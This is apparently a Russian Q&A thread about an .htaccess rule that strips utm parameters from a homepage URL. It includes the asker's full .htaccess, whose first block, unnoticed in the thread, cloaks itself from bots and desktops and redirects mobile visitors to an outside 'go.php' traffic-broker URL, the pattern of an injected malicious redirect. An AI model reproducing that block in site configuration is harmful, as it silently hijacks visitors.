# Htaccess rewriterule

Tags: .htaccess, mod_rewrite

Знаю, что глупый вопрос, но звезды стали не так.
Как сделать редирект с http://example.com/?utm_source=test&utm_medium=test на http://example.com/ ? Нужно учитывать, что нужно это только на главной странице.
Мой вариант не работает:

```
RewriteCond %{REQUEST_URI}  ^/index\.php$ 
RewriteCond %{QUERY_STRING} ^utm\_(.*)=(.*)$ [NC] 
RewriteRule ^(.*)$ http://%{HTTP_HOST}/ [R=301,L]
```

Вот даже нашел на stackoverflow:
Link: http://www.example.com/?utm_source=xxx&..... (triggers 404)
Should Redirect to: http://www.example.com

```
RewriteCond %{QUERY_STRING} ^utm_source=
RewriteRule ^$ http://www.example.com? [R=301,L]
```

Но тоже не помогает.

.htaccess (писал не я. ## - это мой код. Сайт заменен на example.com в целях безопасности):
    RewriteEngine on

```
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://tdsnik.ru/go.php?sid=1 [L,R=302]

AddDefaultCharset utf-8

#php_flag register_long_arrays Off

php_value max_input_vars 10000000

RewriteEngine on
RewriteBase /
#RewriteCond %{HTTP_HOST} example\.com [NC]
#RewriteRule ^(.*)$ http://example.com/$1 [L,R=301]

##RewriteCond %{QUERY_STRING} ^utm_source= [NC]
##RewriteRule ^$ http://example.com? [R=301,L]

##RewriteCond %{REQUEST_URI} ^/index.php
##RewriteCond %{QUERY_STRING} ^utm_source=.*
##RewriteRule . http://%{HTTP_HOST}/? [R=301,L]

##RewriteCond %{REQUEST_URI}  ^/index\.php$
##RewriteCond %{QUERY_STRING} ^utm\_(.*)=(.*)$ [NC]
##RewriteRule ^(.*)$ http://%{HTTP_HOST}/ [R=301,L]

RewriteCond %{HTTP_HOST} ^www\.(.*)$
RewriteCond %{REQUEST_URI} !^/robots\.txt$
RewriteCond %{REQUEST_METHOD} !POST
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_URI} !index.php
RewriteCond %{REQUEST_URI} !^/cp/
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{REQUEST_URI} !(.*)/$
RewriteRule ^(.*)$ http://%{HTTP_HOST}/$1/ [L,R=301]

RewriteCond %{THE_REQUEST} ^[A-Z]+\ /([^/]+/)*index\.php[^\ ]*\ HTTP/
RewriteCond %{REQUEST_METHOD} !POST
RewriteRule ^(([^/]+/)*)index\.php$ http://example.com/$1? [R=301,L]

RewriteCond $1 !^(index\.php|images|robots\.txt|pngfix\.js|kcss|kjs|fckeditor|public|phpThumb|favicon.\ico|google662454c27184fef6.html|live-69a99171.txt|sape.txt)
RewriteRule ^(.*)$ /index.php/$1 [L]
```

Comment: По гугли по запросу редирект 301

Comment: Гуглил. utm-метки могут быть в различных комбинациях. Мне надо их убрать.

Answer (score 2, accepted):

```
RewriteEngine on

RewriteCond %{REQUEST_FILENAME} index.php
RewriteCond %{QUERY_STRING} ^utm_source=.*&utm_medium=.*$
RewriteRule . http://%{HTTP_HOST}/? [R=301,L]
```

Так же не забудьте проверить кэш браузера, он может кэшировать редиректы.

Comment: Ничего. Сейчас выложу htaccess. Что-то тут не ладное.

Comment: Я только немного подредактировал:

    RewriteCond %{REQUEST_FILENAME} index.php
    RewriteCond %{QUERY_STRING} ^utm_.*
    RewriteRule . http://%{HTTP_HOST}/? [R=301,L]